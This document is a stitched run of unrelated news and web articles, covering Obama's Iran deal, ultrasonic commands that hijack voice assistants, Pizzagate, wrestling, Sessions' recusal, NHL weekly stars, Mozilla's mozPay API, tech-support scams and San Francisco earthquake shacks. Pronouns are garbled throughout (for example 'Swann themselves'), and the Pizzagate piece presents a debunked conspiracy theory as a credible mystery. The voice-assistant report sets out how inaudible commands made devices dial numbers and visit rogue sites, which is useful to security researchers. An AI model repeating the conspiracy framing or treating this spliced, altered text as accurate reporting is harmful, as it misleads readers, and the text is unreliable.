What 's more , the expansion of Iran 's power under Bush was not limited to the blossoming of its nuclear program . In 2003 , an extremely hostile neighboring regime ( that had launched a war against it two decades before ) was deposed , creating a power vacuum that Iran filled . Cheney seems to have played a role there . A Cheney-style analysis of the Bush administration 's Iran policy would conclude that it was carrying out a deliberate plan to elevate Iran 's standing .
Such a conclusion would obviously be insane . But it happens to fit the facts far more tightly than the same conclusion about Obama 's Iran policy . And this , in turn , reminds us that the most plausible real-world alternative to Obama 's Iran deal is not some “ better deal. ” The alternative is either war or threatening war while refusing to negotiate .
It is true that the deal Obama struck is probably not going to leave the Middle East a terribly secure place . Iran will most likely test the international community 's willingness to uphold the letter of the agreement , and its willingness to reimpose sanctions if and when Iran violates its terms . History shows that containing the nuclear ambitions of a determined state is extremely hard . Obama 's approach implicitly acknowledges the limits of American leverage , trading away its maximal demand to end all Iranian nuclear work completely in return for pragmatic concessions ( like the elimination of advanced centrifuges , and the establishment of a vigorous inspection regime ) that at least offer a chance to contain Iran 's race to the bomb . The Bush approach claimed to deny Iran any right whatsoever to nuclear research , but its actual success at holding this line was less than nothing .
The Bush administration has been out of power long enough to allow Obama 's critics to conveniently forget how the conservative Iran strategy actually operates in practice ; Cheney 's comments offer a timely reminder .
Image caption Google 's Home , Amazon 's Echo and Apple 's Siri all responded to ultrasonic commands
Voice-controlled assistants by Amazon , Apple and Google could be hijacked by ultrasonic audio commands that humans can not hear , research suggests .
Two teams said the assistants responded to commands broadcast at high frequencies that can be heard by dolphins but are inaudible to humans .
They were able to make smartphones dial phone numbers and visit rogue websites .
Google told the BBC it was investigating the claims presented in the research .
Many smartphones feature a voice-controlled assistant that can be set up to constantly listen for a `` wake word '' .
Google 's assistant starts taking orders when a person says `` ok Google '' , while Apple 's responds to `` hey Siri '' and Amazon 's to `` Alexa '' .
Researchers in China set up a loudspeaker to broadcast voice commands that had been shifted into ultrasonic frequencies .
They said they were able to activate the voice-controlled assistant on a range of Apple and Android devices and smart home speakers from several feet away .
Image copyright Getty Images Image caption Dolphins can hear sound that humans can not
A US team was also able to activate the Amazon Echo smart speaker in the same way .
The US researchers said the attack worked because the target microphone processed the audio and interpreted it as human speech .
`` After processing this ultrasound , the microphone 's recording ... is quite similar to the normal voice , '' they said .
The Chinese researchers suggested an attacker could embed hidden ultrasonic commands in online videos , or broadcast them in public while near a victim .
In tests they were able to make calls , visit websites , take photographs and activate a phone 's airplane mode .
However , the attack would not work on systems that had been trained to respond to only one person 's voice , which Google offers on its assistant .
Apple 's Siri requires a smartphone to be unlocked by the user before allowing any sensitive activity such as visiting a website .
Apple and Google both allow their `` wake words '' to be switched off so the assistants can not be activated without permission .
`` Although the devices are not designed to handle ultrasound , if you put something just outside the range of human hearing , the assistant can still receive it so it 's certainly possible , '' said Dr Steven Murdoch , a cyber-security researcher at University College London .
`` Whether it 's realistic is another question . At the moment there 's not a great deal of harm that could be caused by the attack . Smart speakers are designed not to do harmful things .
`` I would expect the smart speaker vendors will be able to do something about it and ignore the higher frequencies . ''
The Chinese team said smart speakers could use microphones designed to filter out sounds above 20 kilohertz to prevent the attack .
A Google spokesperson said : `` We take user privacy and security very seriously at Google , and we 're reviewing the claims made . ''
Amazon said in a statement : `` We take privacy and security very seriously at Amazon and are reviewing the paper issued by the researchers . ''
January 28 , 2017
Soon After Ben Swann 's 'Pizzagate ' Report Went Viral , The MSM Anchor 'Disappeared ' - Now He 's Back Leaving Cryptic Messages On Social Media , Warning He 's Going To 'Go Dark ' On February 1st
- What Does Ben Swann Know That We Do n't Know ?
By Stefan Stanford - All News Pipeline - Live Free Or Die
According to this new story from the Atlantic Journal Constitution , soon after Atlanta 's CBS46 mainstream media news anchor Ben Swann did what was called a 'groundbreaking ' story on what the msm is calling 'fake news ' , # Pizzagate , Swann has been off the air . For those who may have missed it , you can see Swann in that groundbreaking look at 'pizzagate ' in the final video below .
After the election was over and 'pizzagate ' had largely been 'forgotten ' and disappeared from much of the news , Swann created an online firestorm after 'reviving ' the pizzagate story . As the lead newspaper in Atlanta reported , Swann has been off the air since then with their co-anchor Sharon Reed doing their program by herself .
And while the 'where is Ben Swann ' stories and threads had since started hitting various websites and internet forums as well as videos such as the 2nd video below from Victurus Libertas VL , we get a brand-new update from Swann themselves that only adds several layers to the mystery .
Swann warns us 'there are going to be some changes ' yet as the Facebook commenter points out in the comment seen below , Swann cryptically changed the spelling of Tuesday . Was Swann sending the world a message ?
As Swann posted on both their Facebook page and their Twitter page as seen above and at the top of this story , they will be coming back to CBS46 this Monday night , after a lengthy and unplanned hiatus , yet both their Facebook page and their Twitter page will be going dark in what appears to be a cryptic message that some have already begun to try to decode.Swann warns us 'there are going to be some changes ' yet as the Facebook commenter points out in the comment seen below , Swann cryptically changed the spelling of Tuesday . Was Swann sending the world a message ?
As you can see in the posts , not only is the word Tuesday apparently purposely spelled wrong ( with an allusion to Sun Tzu , the author of 'The Art Of War ' ) , but they get their dates wrong as well - February 1st being Wednesday and not Tuesday . Our commenter , like other commenters , also warns they hope Swann is n't in the process of 'being reprogrammed ' .
What is going on with Ben Swann and 'pizzagate ' that suddenly caused them to miss work with a reappearance coming soon but a total 'blackout ' on all of their social media ? Was Swann threatened ? Swann consistently has ranked as one of the most credible mainstream news performers anywhere in America and as we read in the screenshots below from their fans , people are very , very concerned about the health and safety of Swann and their family right now .
Until last week , CM Punk held the WWE title for 434 days . Bruno Sammartino 's two title reigns lasted a combined 11 years . Let that sink in for a second , because the more I think about it , the more it completely blows my mind .
Factor in stiffer rings , fewer days off and calendars where Sammartino wrestled more matches than days in the year and it 's a no-brainer why the wrestler known for their legendary bear hug submission is headlining what is fast becoming the greatest Hall of Fame class in WWE history ( Sammartino , Mick Foley , Trish Stratus and Bob Backlund ! ) .
In talking to Sammartino and WWE executive Paul Levesque ( Triple H ) Monday to announce the news , the two greats helped break down what life was like on the road back when Bruno main-evented a sold-out Madison Square Garden more than 200 times .
“ It was very difficult . In my time , the rings were very different , ” Sammartino said . “ Back in my day , we wrestled in boxing rings , and because they had to be solid for the fighters , they had steel posts underneath . Those were hard rings , and you wrestled in them six or seven days a week . I was lucky to get two days out of the month off . When you do that for almost eight years , it takes a tremendous toll on you . I was a fanatic for my training , but I started feeling it , and I was going in there hurt , so after eight years , I needed a break . I never intended to retire , but I needed the body to heal so I could go out and wrestle again . ”
The monstrous Mark Henry returned to the ring in a big way Monday night . Courtesy of WWE
For the next year and a half , Sammartino “ took time off ” by limiting their schedule to as few as two matches per week , then when their body felt significantly refreshed , they won the title for a second reign . Said Sammartino : “ That lasted about four years until I broke my neck . That 's when I knew it was time to slow down . But I pride myself on being in great shape and working out religiously , and I think that 's why I was able to go out as hard as I did for as long as I did . ”
Added Levesque : “ In Bruno 's day , if you broke something , you put some tape on it and jumped back in the ring the next day and hoped for the best . Today the business has completely changed . We have the best rings available . We have doctors and trainers who travel with everybody , and the guys are getting medical attention if they need it immediately .
“ If Bruno had all that back then , he 'd probably still be the champ . ”
Want to talk wrestling with Jon Robinson ? Hit up them up on Twitter .
Previous rankings :
Jan. 8 , 2013
Jan. 15 , 2013
Jan. 22 , 2013
Jan. 29 , 2013
House Oversight and Government Reform Committee Chairman Rep. Jason Chaffetz , R-Utah , left , Rep. Jim Jordan , R-Ohio , center , and others , arrive for a Republican strategy session led by House Speaker Paul Ryan , Tuesday , Feb. 14 . | AP Photo Chaffetz calls on Sessions to recuse themselves from Russia probe
House Oversight Committee Chairman Jason Chaffetz on Thursday morning said Attorney General Jeff Sessions should recuse themselves from any investigation into ties between President Donald Trump 's campaign and Russian officials , joining a growing number of Republicans calling for such a move .
“ AG Sessions should clarify their testimony and recuse himself , ” Chaffetz tweeted , after a series of reports spilled out about Sessions meeting twice with Russian ambassador Sergey Kislyak last year , while Sessions served as a chief adviser to Trump 's campaign . Sessions , during their confirmation hearing , had testified that they did not have communications with the Russians during Trump 's campaign .
Story Continued Below
Sessions said late Wednesday night that they “ never met with any Russian officials to discuss issues of the campaign . I have no idea what this allegation is about . It is false . ”
Earlier on Thursday , House Majority Leader Kevin McCarthy said “ it would be easier ” for an investigation into ties between Trump 's associates and Russian officials if Sessions recused himself .
“ I think , the trust of the American people , you recuse yourself in these situations , ” McCarthy ( R-Calif. ) said on MSNBC 's “ Morning Joe. ” “ I just think for any investigation going forward , you want to make sure everybody trusts the investigation ... that there 's no doubt within the investigation .
Sessions so far has expressed openness to recusing himself , but has not definitively said they would do so .
NEW YORK – St. Louis Blues center David Backes , Colorado Avalanche goaltender Semyon Varlamov and Florida Panthers left wing Jonathan Huberdeau have been named the NHL 's `` Three Stars '' for the week ending Jan. 11 .
FIRST STAR – DAVID BACKES , C , ST. LOUIS BLUES
Backes led the NHL with five goals and eight points in three games , posting three consecutive multi-point performances to power the Blues ( 26-13-3 , 55 points ) to a trio of victories . They opened the week by scoring four straight goals in a 6-0 triumph over the Arizona Coyotes Jan. 6 . It marked Backes ' second career four-goal game and first in nearly six years ( also April 2 , 2009 at DET ) . Backes also became the first player to register four consecutive goals in one game – for any team – since Nov. 11 , 2005 ( Ilya Kovalchuk ) and just the second player in Blues history to accomplish that feat ( Red Berenson : Nov. 7 , 1968 ) . Backes followed that performance with two more multi-point games : 1-1—2 in a 7-2 win over the San Jose Sharks Jan. 8 and 0-2—2 in a 5-4 shootout victory over the Carolina Hurricanes Jan. 10 . The 30-year-old Minneapolis , Minn. , native ranks sixth on the Blues with 14-13—27 in 41 appearances this season , including 7-7—14 in their past 12 outings .
SECOND STAR – SEMYON VARLAMOV , G , COLORADO AVALANCHE
Varlamov went 3-0-0 with a 1.67 goals-against average , .962 save percentage and one shutout to lead the Avalanche ( 18-16-8 , 44 points ) to three consecutive wins . They stopped all 54 shots they faced to earn their 16th career shutout in a 2-0 victory over the Chicago Blackhawks Jan. 6 . With that performance , Varlamov set an NHL record for saves in a regular-season road shutout as well as a franchise record for saves in a regular-season shutout . Varlamov made 36 saves in their next start , a 5-2 triumph over the Ottawa Senators Jan. 8 . They followed that with 37 stops – their 12th 30-plus save performance of the season – in a 4-3 win over the Dallas Stars Jan. 10 . The 26-year-old Samara , Russia , native owns a 10-8-5 record with a 2.77 goals-against average , .920 save percentage and three shutouts in 23 appearances this season , including a 6 2-0 mark since returning from injury Dec. 23 .
THIRD STAR – JONATHAN HUBERDEAU , LW , FLORIDA PANTHERS
Huberdeau shared second in the NHL with five points ( 3-2—5 ) in three outings to help the Panthers ( 20-11-9 , 49 points ) complete a perfect three-game trip through Western Canada and move within one point of the final Wild Card spot in the Eastern Conference . They opened the week by notching 2-1—3 , including the primary assist on Aleksander Barkov 's tiebreaking goal , in a 3-1 victory over the Vancouver Canucks Jan. 8 . It marked Huberdeau 's fourth career performance of three or more points and first since April 27 , 2013 ( 0-3—3 ) . Huberdeau rounded out the week with 1-1—2 in a 6-5 win over the Calgary Flames Jan. 9 before being held off the scoresheet in a 4-2 triumph over the Edmonton Oilers Jan. 11 . The 21-year-old Saint-Jerome , Que. , native and 2012-13 Calder Trophy winner ranks fourth on the Panthers with 7-15—22 in 37 contests this season .
Two years after the brutal gang rape of a 23-year-old physiotherapy student , AAP on Tuesday said very little has changed on women 's security front and the Nirbhaya Fund set up following the incident still remains unspent . The party also lamented the fact that Nirbhaya 's parents are still fighting a legal battle in the courts demanding justice for their daughter and conviction of all the offenders .
Chhatra Yuva Sangharsh Samiti , the students wing of the party , organised a human chain at Mandi House to throw light on the issue of women 's security .
December 16 marks the day when the victim was brutally raped , following which they succumbed to their injuries on December 29 .
Lax transport licensing policies came to light again in the recent rape of a young woman by a driver of UBER cab , an international taxi service . `` The Nirbhaya fund that earmarked Rs 1000 crore in 2013 and 2014 is left unspent by both the UPA and NDA and not a single Nirbhaya centre is up and ready . Police and judicial reforms as recommended by the late Justice JS Verma Committee in 2013 are yet to see the light of day , '' a party spokesperson said .
`` Simple steps such as increasing deployment of female police personnel and surveillance have not been implemented , '' the party said .
The AAP proposed a policy of zero tolerance and strict law enforcement when it comes to crimes against women . `` On an average , 40 cases of crimes against women are registered daily by Delhi police , including at least four cases of rape . `` Sample surveys conducted across the national capital indicate that over 90 % women still feel unsafe , '' the spokesperson added .
A new decentralized platform for work collaboration has now entered the beta stage .
Colony , a project developed on top of the open-source ethereum network , announced earlier this week that it was opening its doors to developers and enthusiasts .
Those using the platform can create or join ‘ colonies ' , earning incentivizing tokens for performing tasks in the form of bounties . The thus-far private beta comes less than a year after Colony netted $ 10,000 at the the Consensus 2016 Proof of Work showcase competition , at which the startup won unanimously .
According to a blog post , Colony is now looking for feedback as it fine-tunes the platform .
The startup wrote :
“ This is the early beta feature set : task management with payments ( your own Colony token ) and transaction records . Do you have an organization that is looking to become open externally and collaborate with talent outside of your organization ? If so , we 're still looking for great people to try our first version of the product once it 's built . ”
Colony went on to emphasize that the beta represents “ a limited subset of the eventual functionality ” – this is to say , users have the ability to assign various tasks and apply budgets for them . Future features like integrations with payment service Stripe and other tools such as Slack and GitHub are in the works .
For now , Colony said , the plan is to let users play with the platform and see what sticks .
“ Our goal is to learn . We want to put something into users ' hands so we can learn as fast as possible about what works , what does n't , and what to prioritize next , ” the startup wrote .
Images via Shutterstock and Colony
The House ran another legislative lap around the Senate in September , widening the gap in the number of bills the chambers have passed this Congress to more than 400 .
With only a lame-duck session remaining , the House since January 2009 has passed 420 bills that have sat on the Senate shelf , according to an updated list provided to The Hill .
ADVERTISEMENT
The gulf in productivity has led to an escalation in tensions between the chambers , culminating in a veritable staring contest last month over the expiring George W. Bush-era tax cuts .
House Democratic leaders have frequently griped at the disparity , and the caucus chairperson , Rep. John Larson ( D-Conn. ) , told The Hill last week that the slow pace of legislating in the Senate , where bills can be held up by the filibuster and other rules , “ infuriates ” members of the House .
Rank-and-file House Democrats said the lack of Senate action on legislation they had cast tough votes on had left them twisting in the wind before an increasingly agitated electorate . At the top of the list was the June 2009 cap-and-trade energy and climate bill , which passed the House by a slim margin but never made it to the Senate floor .
The gap in approved legislation increased by 48 in the three weeks Congress was in session in September , and by 130 since The Hill first reported on the disparity in February .
Among the House-passed bills from the most recent period still awaiting action in the Senate are measures to audit the claims fund set up by BP after the Gulf oil spill and legislation to increase screening for diabetes . The Senate has also yet to sign off on naming post offices for George C. Marshall , the late actor Jimmy Stewart and the civil rights leader Dorothy Height .
A spokesperson for Senate Majority Leader Harry Reid Harry Mason ReidBottom Line Brennan fires back at 'selfish ' Trump over Harry Reid criticism Trump rips Harry Reid for 'failed career ' after ex-Dem leader slams them in interview MORE ( D-Nev. ) declined comment . The Senate has a busy agenda for the lame-duck session in November but is expected to make no more than a small dent in the House stack before the 111th Congress concludes .
There are also bills that have passed the Senate but not the House , including a child nutrition measure being pushed by first lady Michelle Obama and the White House . ( Lawmakers in the House have yet to agree on a way to pay for the funding in the bill . )
House leaders drew a line in the sand on holding a House vote on tax cuts set to expire at the end of the year , saying the Senate would have to act first .
When the Senate decided to punt the issue until after the elections , the House followed suit , despite protests from liberal members who wanted to cast their vote to extend middle-class tax cuts before they left for the campaign trail .
What 's wrong with payments on the web ? Any website can already host a shopping cart and take credit card payments or something similar . The freedom of today 's web supports many business models . Here 's what 's wrong :
Users can not choose how to pay ; they have to select from one of the pre-defined options .
In most cases , the user has to type in an actual credit card number on each site . This is like giving someone the keys to your expensive car , letting them drive it around the block in a potentially dangerous neighborhood ( the web ) and saying please do n't get carjacked !
Merchants typically have to manage all this on their own : payment processor setup , costly processing fees , and possibly even PCI compliance .
There are services to mitigate a lot of these complications such as PayPal , Stripe , and others but they are n't integrated into web devices very well . Mozilla wants to introduce a common web API to make payments easy and secure on web devices yet still as flexible as the checkout button for merchants .
As a first step , Mozilla will introduce navigator.mozPay ( ) in Firefox OS so that web apps can accept payments .
How Does It Work ?
navigator.mozPay ( ) is a JavaScript API inspired by google.payments.inapp.buy ( ) but modified for things like multiple payment providers and carrier billing . When a web app invokes navigator.mozPay ( ) in Firefox OS , the device shows a secure window with a concise UI . After authenticating , the user can easily charge the payment to their mobile carrier bill or credit card . When completed , the app delivers the product . Repeat purchases are quick and easy .
In an earlier article I talked about purchasing an app and receiving a receipt . navigator.mozPay ( ) is different in that there is no concept of what product is purchased , it 's just an API to facilitate a payment for a digital good or service , whatever that may be .
The payment starts and finishes in the client but further processing and notifications happen server side . This article briefly explains how it all fits together . For complete , in-depth documentation read the Firefox Marketplace guide to in-app payments .
Integrating With A Payment Provider
Multiple providers will facilitate payments behind the scenes of navigator.mozPay ( ) . For example , the Firefox Marketplace will be able to facilitate payments .
As a developer you will essentially grant permission to each provider that you would like to sell through . In the current design of the API , you do this by asking each provider for an Application Key and an Application Secret so that you can digitally sign payment requests . A signed request prevents unauthorized parties from selling your products and prevents users from tampering with the price , etc .
Initiating A Payment
When the user clicks a Buy button in your web app , you create a JSON Web Token ( JWT ) with your Application Secret . If you have agreements with multiple providers , you would create a JWT for each provider . Starting a payment looks roughly like this :
document . querySelector ( 'button.buy ' ) . onclick = function ( ) { navigator . mozPay ( [ mozillaJWT , otherJWT , ... ] ) ; } ; document.querySelector ( 'button.buy ' ) .onclick = function ( ) { navigator.mozPay ( [ mozillaJWT , otherJWT , ... ] ) ; } ;
Defining A Product
A JWT is a signed JSON object that defines details like the product name and price . Here is an example with some attributes removed for brevity :
{ `` iss '' : APPLICATION_KEY , `` aud '' : `` marketplace.firefox.com '' , ... `` request '' : { `` name '' : `` Magical Unicorn '' , `` pricePoint '' : 1 , `` postbackURL '' : `` https : //yourapp.com/postback '' , `` chargebackURL '' : `` https : //yourapp.com/chargeback '' } } { `` iss '' : APPLICATION_KEY , `` aud '' : `` marketplace.firefox.com '' , ... `` request '' : { `` name '' : `` Magical Unicorn '' , `` pricePoint '' : 1 , `` postbackURL '' : `` https : //yourapp.com/postback '' , `` chargebackURL '' : `` https : //yourapp.com/chargeback '' } }
You define prices as price points so that the payment provider can handle currency conversions for you in each region . In this example , pricePoint 1 might be €0.89 or $ 0.99 , etc . Micropayments in small amounts will be supported . Consult the navigator.mozPay ( ) spec for details on how to construct a payment request JWT .
Completing a Payment
To complete the payment , you need to wait for the provider to POST a result to your server 's postbackURL ( on success ) or chargebackURL ( on failure ) . A more complete example of requesting a purchase in JavaScript would involve waiting for the postback to arrive , like this :
var request = navigator . mozPay ( [ mozillaJWT , otherJWT ] ) ; request . onsuccess = function ( ) { // The payment window has closed . whenPaymentResultReceived ( function ( ) { console . log ( 'Success ! User has purchased a Magical Unicorn . ' ) ; } ) ; } ; var request = navigator.mozPay ( [ mozillaJWT , otherJWT ] ) ; request.onsuccess = function ( ) { // The payment window has closed . whenPaymentResultReceived ( function ( ) { console.log ( 'Success ! User has purchased a Magical Unicorn . ' ) ; } ) ; } ;
To implement whenPaymentResultReceived ( ) you might open a web socket to your server , wait for the payment result , and verify the incoming JWT signature . The navigator.mozPay ( ) spec has details on how postback and chargeback notifications work .
Try It Out
Payments are n't fully live yet in the Firefox Marketplace but you can simulate a payment to test out your code . Log into the Firefox Marketplace Developer Hub and generate an Application Key and Application Secret for simulations . With those keys you can add a special parameter to the JWT like this :
{ `` request '' : { `` name '' : `` Magical Unicorn '' , `` pricePoint '' : 1 , ... `` simulate '' : { `` result '' : `` postback '' } } } { `` request '' : { `` name '' : `` Magical Unicorn '' , `` pricePoint '' : 1 , ... `` simulate '' : { `` result '' : `` postback '' } } }
This will show a payment window on Firefox OS but it wo n't charge you real money . It will let you test your client side JavaScript code and your server postback handlers to make sure everything is integrated smoothly . When you go live , just remove the simulate attribute . If you 're new to Firefox OS development , check out the Firefox OS Simulator .
If you 're already working on a game or a web app for Firefox OS try thinking about using navigator.mozPay ( ) to offer premium content .
This Would Be Way Easier With A Library
We thought so too ! We built libraries for Node.JS and Python to make the server side logic for navigator.mozPay ( ) as easy as possible . Libraries for more languages are on the way . We also are experimenting with removing the server prerequisite entirely .
Current Status
As you can probably tell by the prefix , navigator.mozPay ( ) is an experimental API and might change drastically or become unprefixed without notice . It will process live payments on the first Firefox OS phones and evolve quickly from real world usage .
Mozilla plans to work with other vendors through the W3C to reach consensus on a common API that supports web payments in the best way possible . After shipping in Firefox OS , Mozilla plans to add navigator.mozPay ( ) to Firefox for Android and desktop Firefox .
New Business Models
Advertising has been the primary business model on the web for a long time but users have made it clear that they do n't want to see ads . Mozilla is n't trying to directly disrupt the ad business but it is trying to fix serious privacy issues relating to ad networks .
What if users explicitly paid for content instead ? navigator.mozPay ( ) enables this kind of direct payment model : if something is good on the web , you can pay for it . It already seems to be working well for existing mobile apps . Will mobile ads even generate the same revenue for content producers as they do on desktop ? I do n't have answers to these questions but one thing is for certain : the web should support businesses of all kinds and payments should be a first class feature of the web .
Is It Webby ?
Mozilla 's main goal with navigator.mozPay ( ) is to give users and merchants choice , security , and an easy-to-use payments system . The details about how merchants interact with payment providers is not yet specified in the API and that is clearly a gap . The first Firefox OS phones will ship with a whitelist of allowed payment providers which is also not ideal .
In a more webby model , all parties involved in the payment would be fully decentralized so that innovation can occur naturally and unknown payment providers could emerge . Who will be the next M-Pesa ? An elegant API would support that . Building a secure decentralized payment API is an ambitious challenge ; the solution would need to address these core trust issues :
How can customers trust that they will receive the goods after paying ?
How would customers ensure that their payment credentials are handled securely ?
How do merchants guarantee that they 'll get paid after delivering goods ?
Consumers like when a company offers good customer service .
So you need to know that while the people behind Microsoft and Windows want to have satisfied customers , they are n't going to call you to report there 's a problem with your computer .
But scammers might .
That 's right . They impersonate company reps and try to steal money or personal data from computer users like Lewis Edge .
Edge , a 73-year-old grandfather of four , contacted Bamboozled about their experiences with these cons . They have n't ever fallen for one , but the calls just keep on coming and they wanted others to know what to watch out for .
`` I have been repeatedly targeted by callers with a heavy foreign accent who claim to be with Microsoft or Microsoft 's security department , '' Edge said , noting the originating phone number is usually blocked from their caller ID . `` The callers begin the conversation by telling me that my computer is infected with a virus and they 've called to ` help me fix the problem . ' ''
Edge said the callers want to log on to their computer and take control of it .
`` What they would do from there is anybody 's guess , '' they said .
Exactly what they would do depends on the scam .
Some fraudsters will tell you to visit a legitimate web site to download software that will allow them to take control of your computer , Microsoft says on its web site . The scammers would then adjust your privacy and security settings so your computer is vulnerable and accessible to the scammers , should they want to return to your machine .
In other varieties of the scam , the caller will work with a computer user , tricking them into installing malicious software that could capture sensitive data , such as online banking user names and passwords , the Microsoft web site says .
Credit card information is something else they 're after . They 'll tell you that you have to pay for software that will help your problem , or they may bill you for services they never provide . Or they may just steal your card numbers and sell them on the black market .
The hucksters may not ask for your credit card information directly , because hey , that 's a little suspicious . So they may direct you to a fake web site that will intake your personal financial information .
Edge said they came up with a terrific way to expose the scammy nature of these callers .
They ask them to give them the IP address of their computer .
`` If my computer were infected with a virus and sending it over the internet , a company with Microsoft 's resources would certainly be able to provide me with that information , '' Edge said . `` When the caller can not give me a legitimate answer to that question , I then ask them to tell me who they believe they 're calling and my physical location . Their inability to provide that information also stops them in their tracks . ''
If you 're wondering how to look up your IP address , just do a quick Google search and you 'll come up with lots of web sites that will show you your address at no cost .
WHAT IF IT 'S TOO LATE ?
If a fake tech support person had you going for a while and you think you may have downloaded something you should n't have , Microsoft offers some advice :
First , change your passwords . Do it for your computer , your email accounts , and any online bank , investment and credit card accounts .
Next , use an anti-virus or security program to scan your machine for unwanted programs and other malicious stuff . Or , use some free programs from Microsoft . It recommends you start with a scan of your computer with the Microsoft Safety Scanner , which will tell you if you have malware . Then , you can install Microsoft Security Essentials , which the company says `` guards against viruses , spyware , and other malicious software . '' If you have Windows 8 , Windows Defender is the program you 'll need .
Those Microsoft programs are free , the company says , so if a tech help person offers to sell them to you , it 's another scam .
And for the record , we 're not recommending these programs over other anti-virus programs . It 's just the option Microsoft offers .
Finally , you should report the scam to Microsoft . Also file a complaint with the Federal Trade Commission .
Microsoft also wants you to know that while it will never call users out of the blue , there are some cases in which the company will work with your internet service provider and call you to fix a malware-infected computer . It recently did that with something called Project MARS , short for the Microsoft Active Response for Security initiative . Among its goals is to take down `` botnets ( armies of malware-infected PCs operating secretly under the remote control of a criminal ) , seizing the infrastructure and domains criminals use to control them and taking the information we gain in those efforts to help better protect the Internet community and our customers , '' the Microsoft web site says .
`` These calls will be made by someone with whom you can verify you already are a customer , '' the web site says . `` You will never receive a legitimate call from Microsoft or our partners to charge you for computer fixes . ''
If you ever want to be sure , call Microsoft directly at ( 800 ) 426-9400 .
Edge says their computer is clean . They keep it protected with highly-rated anti-virus software and they run scans and updates regularly .
`` I 'm optimistic that other seniors , or other citizens , will not be gullible enough to fall for such a scam , but I receive similar calls several times per month , so the scammers are obviously persistent despite my repeated requests for them to put me on their ` Do Not Call ' list , '' Edge said .
We 're optimistic , too . But we 'll keep writing these stories until such scams are a thing of the past .
A girl can dream , ca n't she ?
Have you been Bamboozled ? Reach Karin Price Mueller at Bamboozled @ NJAdvanceMedia.com . Follow them on Twitter @ KPMueller . Find Bamboozled on Facebook . Mueller is also the founder of NJMoneyHelp.com .
SINGAPORE : NTUC FairPrice will shave two per cent off prices for fresh fruit and vegetables once a week until the end of the year , it said on Tuesday ( Oct 3 ) .
In a media release , the company said the discount will apply on Wednesdays at all its 143 outlets including FairPrice supermarkets , FairPrice Shop , FairPrice Finest and FairPrice Xtra .
Advertisement
The initiative is estimated to cost S $ 360,000 , FairPrice said , and is aimed at promoting healthier eating among Singaporeans .
It is its second such initiative since Prime Minister Lee Hsien Loong brought up diabetes as a big cause of ill health at the last National Day Rally and urged Singaporeans to exercise more and watch what they eat .
FairPrice offered discounts of at least 10 per cent on eight healthier rice products in August . The company added that it has also `` supported various public education campaigns to promote healthy eating and active living '' in recent years , including taking 10 per cent off FairPrice house brand fresh produce for six months .
Micro-units and tiny homes have trendiness on their side , but living small is nothing new in San Francisco . In fact , more than 100 years ago , a huge proportion of San Franciscans were living in houses under 200 square feet . After the 1906 earthquake and fire ravaged the city and left thousands homeless , a unique and beloved housing type was born—the earthquake shack .
The 1906 earthquake and fire was a beastly disaster . It destroyed 500 city blocks and left 250,000 citizens ( over half the city 's population ) homeless . Refugees migrated west to the underpopulated parts of the city and settled in areas like Golden Gate Park and the Presidio . The Army ran 21 refugee camps , housing 20,000 people in tents . There were camps in Dolores Park , Precita Park , and even Camp Richmond ( known now as the road and green strip of Park Presidio Boulevard ) .
The tent camps worked pretty well for a while—they were well organized and formed social structures like any other neighborhood—but once winter came along , a more substantial solution was in order . In a joint effort between the San Francisco Relief Corporation , the San Francisco Parks Commission , and the Army , union carpenters built more than 5,000 small wooden cottages . The design is said to be courtesy of Army General Greely , who had previously built shelters in the Arctic , though parks superintendent John McLaren played a big role , too .
The cottages came to house more than 16,000 people . They were teeny tiny by today 's standards , ranging from 10 by 14 feet to 14 by 18 feet . Walls were made of California redwood , the flooring was fir , and the roofs were shingled in cedar . They were even painted green to blend into the parks better .
As a way to help the rebuild of San Francisco 's housing stock , the earthquake shacks were essentially rent to own . Tenants paid $ 2/month ( take a minute to pick your jaw up off the floor ) toward the total cost of $ 50 . Once the cottage was all paid off , the owner had the responsibility to move it from the camp to a permanent location . In a happy twist of fate , the program enabled lower-income residents to become homeowners for the first time .
Once the cottages were moved to their new homes , the owners would build extensions onto them or even hodge-podge a few together to make a bigger house . That 's why many of the remaining shacks are borderline unidentifiable today from behind their larger facades . The surviving shacks are scattered all over the city , and sometimes they even come up for sale .
preserve some of the remainders . They also had their own house of three Frankenshacks Back in the 1980s , Jane Cryan , a Sunset resident and owner of a former earthquake shack , lobbied the city to . They also had their own house of three Frankenshacks landmarked
The last refugee camp closed in June 1908 , just over two years after the disaster . Two shacks have been restored and are in the Presidio , tucked behind the Old Post Hospital near the corner of Lincoln and Mesa . The Western Neighborhoods Project also restored four shacks ( taken from two larger houses on Kirkham Street in the Outer Sunset ) . One is now part of the conservation center at the SF Zoo , while the other three are part of the Fifth Avenue Institute in Oakland , which aims to turn them into artist studios and a community space .
· San Francisco Landmark # 171 [ Noehill ]
· 1906 Earthquake : Refugee Camps [ NPS ]
· 1906 Earthquake Refugee Cottages [ Western Neighborhood Project ]
· Take Cover in This $ 799K-Magnitude Earthquake Shackteau [ Curbed SF ]
· Previous Coverage of Earthquake Shacks [ Curbed SF ]
· All Micro Week Coverage [ Curbed SF ]
The cartoonist who won the Pulitzer Prize for editorial cartooning this week says Apple has asked them to resubmit an iPhone app that it earlier rejected because it “ ridicules public figures . ”
Mark Fiore An image from one of the Flash cartoons on Mark Fiore 's site that Mr. Fiore says would have gone on their iPhone app .
Mark Fiore , who won the prize for animations that ran on SFGate.com , submitted an iPhone app to Apple last year and received an email informing them that their application had been denied , according to a post by Laura McGann at Harvard 's Nieman Journalism Lab . In an email that Mr. Fiore said was from Apple , the company wrote that the app was being rejected because it “ contains content that ridicules public figures. ” According to the email , the app was in violation of a clause in the iPhone developer agreement that allows Apple to reject materials that it believes may be found “ objectionable . ”
But a representative from Apple called the cartoonist Thursday and suggested that they resubmit the app , Mr. Fiore said in an interview . “ I feel kind of guilty , ” they said . “ I 'm getting preferential treatment because I got the Pulitzer . ”
Share on Twitter Tweet Share on Facebook Share
A long-padlocked Fort Greene park could reopen thanks to a city push to make it safe to hang out in once more .
BAM Park , bounded by Lafayette Avenue and Fulton and Saint Felix streets , has been closed to the public for nine years due to unstable ground , but plans to open it back up are finally moving forward . Mayor DeBlasio announced in mid-July that their administration would pursue fixing up the green-space . The pro-business Downtown Brooklyn Partnership is eager to lend a hand .
“ To take back a park that was literally shuttered for so long is really great , ” said Andrew Kalish , director of cultural development for the Partnership .
